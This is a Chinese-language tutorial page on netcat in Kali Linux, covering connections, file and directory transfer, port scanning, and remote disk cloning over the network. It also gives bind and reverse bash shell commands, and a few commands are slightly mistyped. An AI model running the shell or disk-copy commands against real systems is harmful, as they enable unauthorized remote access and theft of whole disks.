kali 工具NETCAT的使用方法,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
1.NETCAT作为客户端常用的命令
nc -v verbose [use twice to be more verbose]
nc -n numeric-only IP addresses, no DNS
下列是nc的所有命令:
nc -vn 123.125.50.29 110(POP3服务器的110端口)
nc -nv 202.181.12.12 25(SMTP服务器的25端口)
2.NC--传输文本信息
服务器:nc -l -p 端口号
客户端:nc -nv 服务器的ip 端口号
应用:远程电子取证
ls -l的取证
ps aux的取证
3.nc文件/目录传输
(1)文件传输
往服务器传文件:
服务器:nc -ip 端口号 > 文件名
客户端:nc -nv 服务器ip地址 端口号 < 文件名 -q 1
往客户端传文件:
服务器:nc -lp 端口号 < 文件名 -q 1
客户端:nc -nv 服务器ip地址 端口号 > 文件名
2)目录传输
也涉及双向,和上述的文件传输类似
向客户端发送文件目录:
服务器:tar -cvf - 目录名/ | nc -lp 端口号 -q 1
客户端:nc -nv 服务器ip地址 端口号 | tar -xvf -
(3)加密传文件
服务器:nc -lp 端口号 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件名
客户端:mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件名 | nc -nv ip地址 端口号-q 1
4.nc-流媒体服务
服务器:cat 文件名.mp4 | nc -lp 端口号
客户端:nc -nv 服务器ip地址 端口号 | 播放器(mplayer) -vo x11 -cache 3000 -
5.nc--端口扫描
nc -nvz ip地址 端口范围 //扫描TCP端口
nc -nvzu ip地址 端口范围 //扫描UDP端口
每一个扫描器的扫描结果都不是特别准确的,可以多使用几种方式对端口进行扫描以增加准确性
6.nc--远程克隆硬盘
服务器:nc -lp 端口号 | dd of=/dev/sda
客户端:dd if=/dev/sda | nc -nv 服务器ip地址 端口号 -q 1
远程电子取证,可以将目标服务器硬盘远程复制,或者内存
7.nc--远程控制
正向:服务器:nc -lp 端口 -C bash
客户端:nc -nv 服务器ip地址 端口
这样可以使服务器获得客户端的一个bash
反向:服务器:nc -lp 端口
客户端:nc 服务器ip地址 端口 -C bash
这样可以使客户端获得服务器的一个bash
nc缺乏加密和身份验证的能力
关于kali 工具NETCAT的使用方法问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。